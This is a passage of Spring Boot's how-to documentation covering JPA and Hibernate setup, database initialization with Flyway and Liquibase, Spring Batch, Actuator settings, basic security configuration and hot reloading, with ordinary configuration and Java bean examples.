addition, all properties in `+spring.jpa.properties.*+` are passed through as normal JPA properties (with the prefix stripped) when the local `EntityManagerFactory` is created.\n\n[WARNING]\n====\nYou need to ensure that names defined under `+spring.jpa.properties.*+` exactly match those expected by your JPA provider.\nSpring Boot will not attempt any kind of relaxed binding for these entries.\n\nFor example, if you want to configure Hibernate's batch size you must use `+spring.jpa.properties.hibernate.jdbc.batch_size+`.\nIf you use other forms, such as `batchSize` or `batch-size`, Hibernate will not apply the setting.\n====\n\nTIP: If you need to apply advanced customization to Hibernate properties, consider registering a `HibernatePropertiesCustomizer` bean that will be invoked prior to creating the `EntityManagerFactory`.\nThis takes precedence to anything that is applied by the auto-configuration.\n\n\n\n[[howto-configure-hibernate-naming-strategy]]\n=== Configure Hibernate Naming Strategy\nHibernate uses {hibernate-docs}#naming[two different naming strategies] to map names from the object model to the corresponding database names.\nThe fully qualified class name of the physical and the implicit strategy implementations can be configured by setting the `spring.jpa.hibernate.naming.physical-strategy` and `spring.jpa.hibernate.naming.implicit-strategy` properties, respectively.\nAlternatively, if `ImplicitNamingStrategy` or `PhysicalNamingStrategy` beans are available in the application context, Hibernate will be automatically configured to use them.\n\nBy default, Spring Boot configures the physical naming strategy with `SpringPhysicalNamingStrategy`.\nThis implementation provides the same table structure as Hibernate 4: all dots are replaced by underscores and camel casing is replaced by underscores as well.\nBy default, all table names are generated in lower case, but it is possible to override that flag if your schema requires it.\n\nFor example, a `TelephoneNumber` entity is mapped to the `telephone_number` table.\n\nIf you prefer to use Hibernate 5's default instead, set the following property:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.jpa.hibernate.naming.physical-strategy=org.hibernate.boot.model.naming.PhysicalNamingStrategyStandardImpl\n----\n\nAlternatively, you can configure the following bean:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic PhysicalNamingStrategy physicalNamingStrategy() {\n\t\treturn new PhysicalNamingStrategyStandardImpl();\n\t}\n----\n\nSee {spring-boot-autoconfigure-module-code}\/orm\/jpa\/HibernateJpaAutoConfiguration.java[`HibernateJpaAutoConfiguration`] and {spring-boot-autoconfigure-module-code}\/orm\/jpa\/JpaBaseConfiguration.java[`JpaBaseConfiguration`] for more details.\n\n\n\n[[howto-configure-hibernate-second-level-caching]]\n=== Configure Hibernate Second-Level Caching\nHibernate {hibernate-docs}#caching[second-level cache] can be configured for a range of cache providers.\nRather than configuring Hibernate to lookup the cache provider again, it is better to provide the one that is available in the context whenever possible.\n\nIf you're using JCache, this is pretty easy.\nFirst, make sure that `org.hibernate:hibernate-jcache` is available on the classpath.\nThen, add a `HibernatePropertiesCustomizer` bean as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/jpa\/HibernateSecondLevelCacheExample.java[tag=configuration]\n----\n\nThis customizer will configure Hibernate to use the same `CacheManager` as the one that the application uses.\nIt is also possible to use separate `CacheManager` instances.\nFor details, refer to {hibernate-docs}#caching-provider-jcache[the Hibernate user guide].\n\n\n\n[[howto-use-dependency-injection-hibernate-components]]\n=== Use Dependency Injection in Hibernate Components\nBy default, Spring Boot registers a `BeanContainer` implementation that uses the `BeanFactory` so that converters and entity listeners can use regular dependency injection.\n\nYou can disable or tune this behaviour by registering a `HibernatePropertiesCustomizer` that removes or changes the `hibernate.resource.beans.container` property.\n\n\n\n[[howto-use-custom-entity-manager]]\n=== Use a Custom EntityManagerFactory\nTo take full control of the configuration of the `EntityManagerFactory`, you need to add a `@Bean` named '`entityManagerFactory`'.\nSpring Boot auto-configuration switches off its entity manager in the presence of a bean of that type.\n\n\n\n[[howto-use-two-entity-managers]]\n=== Use Two EntityManagers\nEven if the default `EntityManagerFactory` works fine, you need to define a new one.\nOtherwise, the presence of the second bean of that type switches off the default.\nTo make it easy to do, you can use the convenient `EntityManagerBuilder` provided by Spring Boot.\nAlternatively, you can just the `LocalContainerEntityManagerFactoryBean` directly from Spring ORM, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t\/\/ add two data sources configured as above\n\n\t@Bean\n\tpublic LocalContainerEntityManagerFactoryBean customerEntityManagerFactory(\n\t\t\tEntityManagerFactoryBuilder builder) {\n\t\treturn builder\n\t\t\t\t.dataSource(customerDataSource())\n\t\t\t\t.packages(Customer.class)\n\t\t\t\t.persistenceUnit(\"customers\")\n\t\t\t\t.build();\n\t}\n\n\t@Bean\n\tpublic LocalContainerEntityManagerFactoryBean orderEntityManagerFactory(\n\t\t\tEntityManagerFactoryBuilder builder) {\n\t\treturn builder\n\t\t\t\t.dataSource(orderDataSource())\n\t\t\t\t.packages(Order.class)\n\t\t\t\t.persistenceUnit(\"orders\")\n\t\t\t\t.build();\n\t}\n----\n\nNOTE: When you create a bean for `LocalContainerEntityManagerFactoryBean` yourself, any customization that was applied during the creation of the auto-configured `LocalContainerEntityManagerFactoryBean` is lost.\nFor example, in case of Hibernate, any properties under the `spring.jpa.hibernate` prefix will not be automatically applied to your `LocalContainerEntityManagerFactoryBean`.\nIf you were relying on these properties for configuring things like the naming strategy or the DDL mode, you will need to explicitly configure that when creating the `LocalContainerEntityManagerFactoryBean` bean.\nOn the other hand, properties that get applied to the auto-configured `EntityManagerFactoryBuilder`, which are specified via `spring.jpa.properties`, will automatically be applied, provided you use the auto-configured `EntityManagerFactoryBuilder` to build the `LocalContainerEntityManagerFactoryBean` bean.\n\nThe configuration above almost works on its own.\nTo complete the picture, you need to configure `TransactionManagers` for the two `EntityManagers` as well.\nIf you mark one of them as `@Primary`, it could be picked up by the default `JpaTransactionManager` in Spring Boot.\nThe other would have to be explicitly injected into a new instance.\nAlternatively, you might be able to use a JTA transaction manager that spans both.\n\nIf you use Spring Data, you need to configure `@EnableJpaRepositories` accordingly, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration(proxyBeanMethods = false)\n\t@EnableJpaRepositories(basePackageClasses = Customer.class,\n\t\t\tentityManagerFactoryRef = \"customerEntityManagerFactory\")\n\tpublic class CustomerConfiguration {\n\t\t...\n\t}\n\n\t@Configuration(proxyBeanMethods = false)\n\t@EnableJpaRepositories(basePackageClasses = Order.class,\n\t\t\tentityManagerFactoryRef = \"orderEntityManagerFactory\")\n\tpublic class OrderConfiguration {\n\t\t...\n\t}\n----\n\n\n\n[[howto-use-traditional-persistence-xml]]\n=== Use a Traditional persistence.xml File\nSpring Boot will not search for or use a `META-INF\/persistence.xml` by default.\nIf you prefer to use a traditional `persistence.xml`, you need to define your own `@Bean` of type `LocalEntityManagerFactoryBean` (with an ID of '`entityManagerFactory`') and set the persistence unit name there.\n\nSee {spring-boot-autoconfigure-module-code}\/orm\/jpa\/JpaBaseConfiguration.java[`JpaBaseConfiguration`] for the default settings.\n\n\n\n[[howto-use-spring-data-jpa--and-mongo-repositories]]\n=== Use Spring Data JPA and Mongo Repositories\nSpring Data JPA and Spring Data Mongo can both automatically create `Repository` implementations for you.\nIf they are both present on the classpath, you might have to do some extra configuration to tell Spring Boot which repositories to create.\nThe most explicit way to do that is to use the standard Spring Data `+@EnableJpaRepositories+` and `+@EnableMongoRepositories+` annotations and provide the location of your `Repository` interfaces.\n\nThere are also flags (`+spring.data.*.repositories.enabled+` and `+spring.data.*.repositories.type+`) that you can use to switch the auto-configured repositories on and off in external configuration.\nDoing so is useful, for instance, in case you want to switch off the Mongo repositories and still use the auto-configured `MongoTemplate`.\n\nThe same obstacle and the same features exist for other auto-configured Spring Data repository types (Elasticsearch, Solr, and others).\nTo work with them, change the names of the annotations and flags accordingly.\n\n\n\n[[howto-use-customize-spring-datas-web-support]]\n=== Customize Spring Data's Web Support\nSpring Data provides web support that simplifies the use of Spring Data repositories in a web application.\nSpring Boot provides properties in the `spring.data.web` namespace for customizing its configuration.\nNote that if you are using Spring Data REST, you must use the properties in the `spring.data.rest` namespace instead.\n\n\n[[howto-use-exposing-spring-data-repositories-rest-endpoint]]\n=== Expose Spring Data Repositories as REST Endpoint\nSpring Data REST can expose the `Repository` implementations as REST endpoints for you,\nprovided Spring MVC has been enabled for the application.\n\nSpring Boot exposes a set of useful properties (from the `spring.data.rest` namespace) that customize the {spring-data-rest-api}\/core\/config\/RepositoryRestConfiguration.html[`RepositoryRestConfiguration`].\nIf you need to provide additional customization, you should use a {spring-data-rest-api}\/webmvc\/config\/RepositoryRestConfigurer.html[`RepositoryRestConfigurer`] bean.\n\nNOTE: If you do not specify any order on your custom `RepositoryRestConfigurer`, it runs after the one Spring Boot uses internally.\nIf you need to specify an order, make sure it is higher than 0.\n\n\n\n[[howto-configure-a-component-that-is-used-by-JPA]]\n=== Configure a Component that is Used by JPA\nIf you want to configure a component that JPA uses, then you need to ensure that the component is initialized before JPA.\nWhen the component is auto-configured, Spring Boot takes care of this for you.\nFor example, when Flyway is auto-configured, Hibernate is configured to depend upon Flyway so that Flyway has a chance to initialize the database before Hibernate tries to use it.\n\nIf you are configuring a component yourself, you can use an `EntityManagerFactoryDependsOnPostProcessor` subclass as a convenient way of setting up the necessary dependencies.\nFor example, if you use Hibernate Search with Elasticsearch as its index manager, any `EntityManagerFactory` beans must be configured to depend on the `elasticsearchClient` bean, as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/elasticsearch\/HibernateSearchElasticsearchExample.java[tag=configuration]\n----\n\n\n\n[[howto-configure-jOOQ-with-multiple-datasources]]\n=== Configure jOOQ with Two DataSources\nIf you need to use jOOQ with multiple data sources, you should create your own `DSLContext` for each one.\nRefer to {spring-boot-autoconfigure-module-code}\/jooq\/JooqAutoConfiguration.java[JooqAutoConfiguration] for more details.\n\nTIP: In particular, `JooqExceptionTranslator` and `SpringTransactionProvider` can be reused to provide similar features to what the auto-configuration does with a single `DataSource`.\n\n\n\n[[howto-database-initialization]]\n== Database Initialization\nAn SQL database can be initialized in different ways depending on what your stack is.\nOf course, you can also do it manually, provided the database is a separate process.\nIt is recommended to use a single mechanism for schema generation.\n\n\n\n[[howto-initialize-a-database-using-jpa]]\n=== Initialize a Database Using JPA\nJPA has features for DDL generation, and these can be set up to run on startup against the database.\nThis is controlled through two external properties:\n\n* `spring.jpa.generate-ddl` (boolean) switches the feature on and off and is vendor independent.\n* `spring.jpa.hibernate.ddl-auto` (enum) is a Hibernate feature that controls the behavior in a more fine-grained way.\n This feature is described in more detail later in this guide.\n\n\n\n[[howto-initialize-a-database-using-hibernate]]\n=== Initialize a Database Using Hibernate\nYou can set `spring.jpa.hibernate.ddl-auto` explicitly and the standard Hibernate property values are `none`, `validate`, `update`, `create`, and `create-drop`.\nSpring Boot chooses a default value for you based on whether it thinks your database is embedded.\nIt defaults to `create-drop` if no schema manager has been detected or `none` in all other cases.\nAn embedded database is detected by looking at the `Connection` type.\n`hsqldb`, `h2`, and `derby` are embedded, and others are not.\nBe careful when switching from in-memory to a '`real`' database that you do not make assumptions about the existence of the tables and data in the new platform.\nYou either have to set `ddl-auto` explicitly or use one of the other mechanisms to initialize the database.\n\nNOTE: You can output the schema creation by enabling the `org.hibernate.SQL` logger.\nThis is done for you automatically if you enable the <<spring-boot-features.adoc#boot-features-logging-console-output,debug mode>>.\n\nIn addition, a file named `import.sql` in the root of the classpath is executed on startup if Hibernate creates the schema from scratch (that is, if the `ddl-auto` property is set to `create` or `create-drop`).\nThis can be useful for demos and for testing if you are careful but is probably not something you want to be on the classpath in production.\nIt is a Hibernate feature (and has nothing to do with Spring).\n\n\n\n[[howto-initialize-a-database-using-spring-jdbc]]\n=== Initialize a Database using basic SQL scripts\nSpring Boot can automatically create the schema (DDL scripts) of your `DataSource` and initialize it (DML scripts).\nIt loads SQL from the standard root classpath locations: `schema.sql` and `data.sql`, respectively.\nIn addition, Spring Boot processes the `schema-$\\{platform}.sql` and `data-$\\{platform}.sql` files (if present), where `platform` is the value of `spring.datasource.platform`.\nThis allows you to switch to database-specific scripts if necessary.\nFor example, you might choose to set it to the vendor name of the database (`hsqldb`, `h2`, `oracle`, `mysql`, `postgresql`, and so on).\n\n[NOTE]\n====\nWhen only basic SQL scripts are used, Spring Boot automatically creates the schema of an embedded `DataSource`.\nThis behavior can be customized by using the configprop:spring.datasource.initialization-mode[] property.\nFor instance, if you want to always initialize the `DataSource` regardless of its type:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.datasource.initialization-mode=always\n----\n\nIn a JPA-based app, you can choose to let Hibernate create the schema or use `schema.sql`, but you cannot do both.\nMake sure to disable `spring.jpa.hibernate.ddl-auto` if you use `schema.sql`.\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.jpa.hibernate.ddl-auto=none\n----\n\nIf you are using a <<spring-boot-features.adoc#howto-use-a-higher-level-database-migration-tool,Higher-level Database Migration Tool>>, like Flyway or Liquibase, you cannot use basic SQL scripts to create and initialize the schema.\nIn this situation, if `schema.sql` and `data.sql` are present, they will be ignored.\nIt is not possible to use a Database Migration Tool to manage schema creation, and a basic SQL script to initialize it.\n====\n\nBy default, Spring Boot enables the fail-fast feature of the Spring JDBC initializer.\nThis means that, if the scripts cause exceptions, the application fails to start.\nYou can tune that behavior by setting `spring.datasource.continue-on-error`.\n\n\n\n[[howto-initialize-a-database-using-r2dbc]]\n=== Initialize a Database Using R2DBC\nIf you are using R2DBC, the regular `DataSource` auto-configuration backs off so none of the options described above can be used.\n\nIf you are using Spring Data R2DBC, you can initialize the database on startup using simple SQL scripts as shown in the following example:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/r2dbc\/R2dbcDatabaseInitializationExample.java[tag=configuration]\n----\n\nAlternatively, you can configure either <<howto-execute-flyway-database-migrations-on-startup,Flyway>> or <<howto-execute-liquibase-database-migrations-on-startup,Liquibase>> to configure a `DataSource` for you for the duration of the migration.\nBoth these libraries offer properties to set the `url`, `username` and `password` of the database to migrate.\n\nNOTE: When choosing this option, `org.springframework:spring-jdbc` is still a required dependency.\n\n\n\n[[howto-initialize-a-spring-batch-database]]\n=== Initialize a Spring Batch Database\nIf you use Spring Batch, it comes pre-packaged with SQL initialization scripts for most popular database platforms.\nSpring Boot can detect your database type and execute those scripts on startup.\nIf you use an embedded database, this happens by default.\nYou can also enable it for any database type, as shown in the following example:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.batch.initialize-schema=always\n----\n\nYou can also switch off the initialization explicitly by setting `spring.batch.initialize-schema=never`.\n\n\n\n[[howto-use-a-higher-level-database-migration-tool]]\n=== Use a Higher-level Database Migration Tool\nSpring Boot supports two higher-level migration tools: https:\/\/flywaydb.org\/[Flyway] and https:\/\/www.liquibase.org\/[Liquibase].\n\n\n\n[[howto-execute-flyway-database-migrations-on-startup]]\n==== Execute Flyway Database Migrations on Startup\nTo automatically run Flyway database migrations on startup, add the `org.flywaydb:flyway-core` to your classpath.\n\nTypically, migrations are scripts in the form `V<VERSION>__<NAME>.sql` (with `<VERSION>` an underscore-separated version, such as '`1`' or '`2_1`').\nBy default, they are in a directory called `classpath:db\/migration`, but you can modify that location by setting `spring.flyway.locations`.\nThis is a comma-separated list of one or more `classpath:` or `filesystem:` locations.\nFor example, the following configuration would search for scripts in both the default classpath location and the `\/opt\/migration` directory:\n\n[source,properties,indent=0,configprops]\n----\n\tspring.flyway.locations=classpath:db\/migration,filesystem:\/opt\/migration\n----\n\nYou can also add a special `\\{vendor}` placeholder to use vendor-specific scripts.\nAssume the following:\n\n[source,properties,indent=0,configprops]\n----\n\tspring.flyway.locations=classpath:db\/migration\/{vendor}\n----\n\nRather than using `db\/migration`, the preceding configuration sets the directory to use according to the type of the database (such as `db\/migration\/mysql` for MySQL).\nThe list of supported databases is available in {spring-boot-module-code}\/jdbc\/DatabaseDriver.java[`DatabaseDriver`].\n\nMigrations can also be written in Java.\nFlyway will be auto-configured with any beans that implement `JavaMigration`.\n\n{spring-boot-autoconfigure-module-code}\/flyway\/FlywayProperties.java[`FlywayProperties`] provides most of Flyway's settings and a small set of additional properties that can be used to disable the migrations or switch off the location checking.\nIf you need more control over the configuration, consider registering a `FlywayConfigurationCustomizer` bean.\n\nSpring Boot calls `Flyway.migrate()` to perform the database migration.\nIf you would like more control, provide a `@Bean` that implements {spring-boot-autoconfigure-module-code}\/flyway\/FlywayMigrationStrategy.java[`FlywayMigrationStrategy`].\n\nFlyway supports SQL and Java https:\/\/flywaydb.org\/documentation\/callbacks.html[callbacks].\nTo use SQL-based callbacks, place the callback scripts in the `classpath:db\/migration` directory.\nTo use Java-based callbacks, create one or more beans that implement `Callback`.\nAny such beans are automatically registered with `Flyway`.\nThey can be ordered by using `@Order` or by implementing `Ordered`.\nBeans that implement the deprecated `FlywayCallback` interface can also be detected, however they cannot be used alongside `Callback` beans.\n\nBy default, Flyway autowires the (`@Primary`) `DataSource` in your context and uses that for migrations.\nIf you like to use a different `DataSource`, you can create one and mark its `@Bean` as `@FlywayDataSource`.\nIf you do so and want two data sources, remember to create another one and mark it as `@Primary`.\nAlternatively, you can use Flyway's native `DataSource` by setting `spring.flyway.[url,user,password]` in external properties.\nSetting either `spring.flyway.url` or `spring.flyway.user` is sufficient to cause Flyway to use its own `DataSource`.\nIf any of the three properties has not been set, the value of its equivalent `spring.datasource` property will be used.\n\nYou can also use Flyway to provide data for specific scenarios.\nFor example, you can place test-specific migrations in `src\/test\/resources` and they are run only when your application starts for testing.\nAlso, you can use profile-specific configuration to customize `spring.flyway.locations` so that certain migrations run only when a particular profile is active.\nFor example, in `application-dev.properties`, you might specify the following setting:\n\n[source,properties,indent=0,configprops]\n----\n\tspring.flyway.locations=classpath:\/db\/migration,classpath:\/dev\/db\/migration\n----\n\nWith that setup, migrations in `dev\/db\/migration` run only when the `dev` profile is active.\n\n\n\n[[howto-execute-liquibase-database-migrations-on-startup]]\n==== Execute Liquibase Database Migrations on Startup\nTo automatically run Liquibase database migrations on startup, add the `org.liquibase:liquibase-core` to your classpath.\n\n[NOTE]\n====\nWhen you add the `org.liquibase:liquibase-core` to your classpath, database migrations run by default for both during application startup and before your tests run.\nThis behavior can be customized by using the configprop:spring.liquibase.enabled[] property, setting different values in the `main` and `test` configurations.\nIt is not possible to use two different ways to initialize the database (e.g. Liquibase for application startup, JPA for test runs).\n====\n\nBy default, the master change log is read from `db\/changelog\/db.changelog-master.yaml`, but you can change the location by setting `spring.liquibase.change-log`.\nIn addition to YAML, Liquibase also supports JSON, XML, and SQL change log formats.\n\nBy default, Liquibase autowires the (`@Primary`) `DataSource` in your context and uses that for migrations.\nIf you need to use a different `DataSource`, you can create one and mark its `@Bean` as `@LiquibaseDataSource`.\nIf you do so and you want two data sources, remember to create another one and mark it as `@Primary`.\nAlternatively, you can use Liquibase's native `DataSource` by setting `spring.liquibase.[url,user,password]` in external properties.\nSetting either `spring.liquibase.url` or `spring.liquibase.user` is sufficient to cause Liquibase to use its own `DataSource`.\nIf any of the three properties has not been set, the value of its equivalent `spring.datasource` property will be used.\n\nSee {spring-boot-autoconfigure-module-code}\/liquibase\/LiquibaseProperties.java[`LiquibaseProperties`] for details about available settings such as contexts, the default schema, and others.\n\n\n\n[[howto-messaging]]\n== Messaging\nSpring Boot offers a number of starters that include messaging.\nThis section answers questions that arise from using messaging with Spring Boot.\n\n\n\n[[howto-jms-disable-transaction]]\n=== Disable Transacted JMS Session\nIf your JMS broker does not support transacted sessions, you have to disable the support of transactions altogether.\nIf you create your own `JmsListenerContainerFactory`, there is nothing to do, since, by default it cannot be transacted.\nIf you want to use the `DefaultJmsListenerContainerFactoryConfigurer` to reuse Spring Boot's default, you can disable transacted sessions, as follows:\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic DefaultJmsListenerContainerFactory jmsListenerContainerFactory(\n\t\t\tConnectionFactory connectionFactory,\n\t\t\tDefaultJmsListenerContainerFactoryConfigurer configurer) {\n\t\tDefaultJmsListenerContainerFactory listenerFactory =\n\t\t\t\tnew DefaultJmsListenerContainerFactory();\n\t\tconfigurer.configure(listenerFactory, connectionFactory);\n\t\tlistenerFactory.setTransactionManager(null);\n\t\tlistenerFactory.setSessionTransacted(false);\n\t\treturn listenerFactory;\n\t}\n----\n\nThe preceding example overrides the default factory, and it should be applied to any other factory that your application defines, if any.\n\n\n\n[[howto-batch-applications]]\n== Batch Applications\nA number of questions often arise when people use Spring Batch from within a Spring Boot application.\nThis section addresses those questions.\n\n\n\n[[howto-spring-batch-specifying-a-data-source]]\n=== Specifying a Batch Data Source\nBy default, batch applications require a `DataSource` to store job details.\nSpring Batch expects a single `DataSource` by default.\nTo have it use a `DataSource` other than the application\u2019s main `DataSource`, declare a `DataSource` bean, annotating its `@Bean` method with `@BatchDataSource`.\nIf you do so and want two data sources, remember to mark the other one `@Primary`.\nTo take greater control, implement `BatchConfigurer`.\nSee {spring-batch-api}\/core\/configuration\/annotation\/EnableBatchProcessing.html[The Javadoc of `@EnableBatchProcessing`] for more details.\n\nFor more info about Spring Batch, see the {spring-batch}[Spring Batch project page].\n\n\n\n[[howto-spring-batch-running-jobs-on-startup]]\n=== Running Spring Batch Jobs on Startup\nSpring Batch auto-configuration is enabled by adding `@EnableBatchProcessing` to one of your `@Configuration` classes.\n\nBy default, it executes *all* `Jobs` in the application context on startup (see {spring-boot-autoconfigure-module-code}\/batch\/JobLauncherApplicationRunner.java[`JobLauncherApplicationRunner`] for details).\nYou can narrow down to a specific job or jobs by specifying `spring.batch.job.names` (which takes a comma-separated list of job name patterns).\n\nSee {spring-boot-autoconfigure-module-code}\/batch\/BatchAutoConfiguration.java[BatchAutoConfiguration] and {spring-batch-api}\/core\/configuration\/annotation\/EnableBatchProcessing.html[@EnableBatchProcessing] for more details.\n\n\n\n[[howto-spring-batch-running-command-line]]\n=== Running from the Command Line\nSpring Boot converts any command line argument starting with `--` to a property to add to the `Environment`, see <<spring-boot-features.adoc#boot-features-external-config-command-line-args,accessing command line properties>>.\nThis should not be used to pass arguments to batch jobs.\nTo specify batch arguments on the command line, use the regular format (i.e. without `--`), as shown in the following example:\n\n[indent=0,subs=\"attributes\"]\n----\n\t$ java -jar myapp.jar someParameter=someValue anotherParameter=anotherValue\n----\n\nIf you specify a property of the `Environment` on the command line, it is ignored by the job.\nConsider the following command:\n\n[indent=0,subs=\"attributes\"]\n----\n\t$ java -jar myapp.jar --server.port=7070 someParameter=someValue\n----\n\nThis provides only one argument to the batch job: `someParameter=someValue`.\n\n\n\n[[howto-spring-batch-storing-job-repository]]\n=== Storing the Job Repository\nSpring Batch requires a data store for the `Job` repository.\nIf you use Spring Boot, you must use an actual database.\nNote that it can be an in-memory database, see {spring-batch-docs}job.html#configuringJobRepository[Configuring a Job Repository].\n\n\n\n[[howto-actuator]]\n== Actuator\nSpring Boot includes the Spring Boot Actuator.\nThis section answers questions that often arise from its use.\n\n\n\n[[howto-change-the-http-port-or-address-of-the-actuator-endpoints]]\n=== Change the HTTP Port or Address of the Actuator Endpoints\nIn a standalone application, the Actuator HTTP port defaults to the same as the main HTTP port.\nTo make the application listen on a different port, set the external property: configprop:management.server.port[].\nTo listen on a completely different network address (such as when you have an internal network for management and an external one for user applications), you can also set `management.server.address` to a valid IP address to which the server is able to bind.\n\nFor more detail, see the {spring-boot-actuator-autoconfigure-module-code}\/web\/server\/ManagementServerProperties.java[`ManagementServerProperties`] source code and \"`<<production-ready-features.adoc#production-ready-customizing-management-server-port>>`\" in the \"`Production-ready features`\" section.\n\n\n\n[[howto-customize-the-whitelabel-error-page]]\n=== Customize the '`whitelabel`' Error Page\nSpring Boot installs a '`whitelabel`' error page that you see in a browser client if you encounter a server error (machine clients consuming JSON and other media types should see a sensible response with the right error code).\n\nNOTE: Set `server.error.whitelabel.enabled=false` to switch the default error page off.\nDoing so restores the default of the servlet container that you are using.\nNote that Spring Boot still tries to resolve the error view, so you should probably add your own error page rather than disabling it completely.\n\nOverriding the error page with your own depends on the templating technology that you use.\nFor example, if you use Thymeleaf, you can add an `error.html` template.\nIf you use FreeMarker, you can add an `error.ftlh` template.\nIn general, you need a `View` that resolves with a name of `error` or a `@Controller` that handles the `\/error` path.\nUnless you replaced some of the default configuration, you should find a `BeanNameViewResolver` in your `ApplicationContext`, so a `@Bean` named `error` would be a simple way of doing that.\nSee {spring-boot-autoconfigure-module-code}\/web\/servlet\/error\/ErrorMvcAutoConfiguration.java[`ErrorMvcAutoConfiguration`] for more options.\n\nSee also the section on \"`<<spring-boot-features.adoc#boot-features-error-handling, Error Handling>>`\" for details of how to register handlers in the servlet container.\n\n\n\n[[howto-sanitize-sensible-values]]\n[[howto-sanitize-sensitive-values]]\n=== Sanitize Sensitive Values\nInformation returned by the `env` and `configprops` endpoints can be somewhat sensitive so keys matching a certain pattern are sanitized by default (i.e. their values are replaced by `+******+`).\n\nThe patterns to use can be customized using the `management.endpoint.env.keys-to-sanitize` and `management.endpoint.configprops.keys-to-sanitize` respectively.\n\nSpring Boot uses sensible defaults for such keys: any key ending with the word \"password\", \"secret\", \"key\", \"token\", \"vcap_services\", \"sun.java.command\", \"uri\", \"uris\", \"address\" or \"addresses\" is sanitized.\nAdditionally, any key that holds the word `credentials` as part of the key is sanitized (configured as a regular expression, i.e. `+.*credentials.*+`).\n\nIf any of the keys to sanitize are URI format (i.e. `<scheme>:\/\/<username>:<password>@<host>:<port>\/`), only the password part is sanitized.\n\n\n\n[[howto-map-health-indicators-to-metrics]]\n=== Map Health Indicators to Micrometer Metrics\nSpring Boot health indicators return a `Status` type to indicate the overall system health.\nIf you want to monitor or alert on levels of health for a particular application, you can export these statuses as metrics via Micrometer.\nBy default, the status codes \"`UP`\", \"`DOWN`\", \"`OUT_OF_SERVICE`\" and \"`UNKNOWN`\" are used by Spring Boot.\nTo export these, you'll need to convert these states to some set of numbers so that they can be used with a Micrometer `Gauge`.\n\nThe following example shows one way to write such an exporter:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\ninclude::{code-examples}\/actuate\/metrics\/MetricsHealthMicrometerExportExample.java[tag=configuration]\n----\n\n\n\n[[howto-security]]\n== Security\nThis section addresses questions about security when working with Spring Boot, including questions that arise from using Spring Security with Spring Boot.\n\nFor more about Spring Security, see the {spring-security}[Spring Security project page].\n\n\n\n[[howto-switch-off-spring-boot-security-configuration]]\n=== Switch off the Spring Boot Security Configuration\nIf you define a `@Configuration` with a `WebSecurityConfigurerAdapter` in your application, it switches off the default webapp security settings in Spring Boot.\n\n\n[[howto-change-the-user-details-service-and-add-user-accounts]]\n=== Change the UserDetailsService and Add User Accounts\nIf you provide a `@Bean` of type `AuthenticationManager`, `AuthenticationProvider`, or `UserDetailsService`, the default `@Bean` for `InMemoryUserDetailsManager` is not created.\nThis means you have the full feature set of Spring Security available (such as {spring-security-docs}#servlet-authentication[various authentication options]).\n\nThe easiest way to add user accounts is to provide your own `UserDetailsService` bean.\n\n\n\n[[howto-enable-https]]\n=== Enable HTTPS When Running behind a Proxy Server\nEnsuring that all your main endpoints are only available over HTTPS is an important chore for any application.\nIf you use Tomcat as a servlet container, then Spring Boot adds Tomcat's own `RemoteIpValve` automatically if it detects some environment settings, and you should be able to rely on the `HttpServletRequest` to report whether it is secure or not (even downstream of a proxy server that handles the real SSL termination).\nThe standard behavior is determined by the presence or absence of certain request headers (`x-forwarded-for` and `x-forwarded-proto`), whose names are conventional, so it should work with most front-end proxies.\nYou can switch on the valve by adding some entries to `application.properties`, as shown in the following example:\n\n[source,properties,indent=0,configprops]\n----\n\tserver.tomcat.remoteip.remote-ip-header=x-forwarded-for\n\tserver.tomcat.remoteip.protocol-header=x-forwarded-proto\n----\n\n(The presence of either of those properties switches on the valve.\nAlternatively, you can add the `RemoteIpValve` by adding a `TomcatServletWebServerFactory` bean.)\n\nTo configure Spring Security to require a secure channel for all (or some) requests, consider adding your own `WebSecurityConfigurerAdapter` that adds the following `HttpSecurity` configuration:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration(proxyBeanMethods = false)\n\tpublic class SslWebSecurityConfigurerAdapter extends WebSecurityConfigurerAdapter {\n\n\t\t@Override\n\t\tprotected void configure(HttpSecurity http) throws Exception {\n\t\t\t\/\/ Customize the application security\n\t\t\thttp.requiresChannel().anyRequest().requiresSecure();\n\t\t}\n\n\t}\n----\n\n\n\n[[howto-hotswapping]]\n== Hot Swapping\nSpring Boot supports hot swapping.\nThis section answers questions about how it works.\n\n\n\n[[howto-reload-static-content]]\n=== Reload Static Content\nThere are several options for hot reloading.\nThe recommended approach is to use <<using-spring-boot.adoc#using-boot-devtools,`spring-boot-devtools`>>, as it provides additional development-time features, such as support for fast application restarts and LiveReload as well as sensible development-time configuration (such as template caching).\nDevtools works by monitoring the classpath for changes.\nThis means that static resource changes must be \"built\" for the change to take effect.\nBy default, this happens automatically in Eclipse when you save your changes.\nIn IntelliJ IDEA, the Make Project command triggers the necessary build.\nDue to the <<using-spring-boot.adoc#using-boot-devtools-restart-exclude, default restart exclusions>>, changes to static resources do not trigger a restart of your application.\nThey do, however, trigger a live reload.\n\nAlternatively, running in an IDE (especially with debugging on) is a good way to do development (all modern IDEs allow reloading of static resources and usually also allow hot-swapping of Java class changes).\n\nFinally, the <<build-tool-plugins.adoc#build-tool-plugins, Maven and Gradle plugins>> can be configured (see the `addResources` property) to support running from the command line with reloading of static files directly from source.\nYou can use that with an external css\/js compiler process if you are writing that code with higher-level tools.\n\n\n\n[[howto-reload-thymeleaf-template-content]]\n=== Reload Templates without Restarting the Container\nMost of the templating technologies supported by Spring Boot include a configuration option to disable caching (described later in this document).\nIf you use the `spring-boot-devtools` module, these properties are <<using-spring-boot.adoc#using-boot-devtools-property-defaults,automatically configured>> for you at development time.\n\n\n\n[[howto-reload-thymeleaf-content]]\n==== Thymeleaf Templates\nIf you use 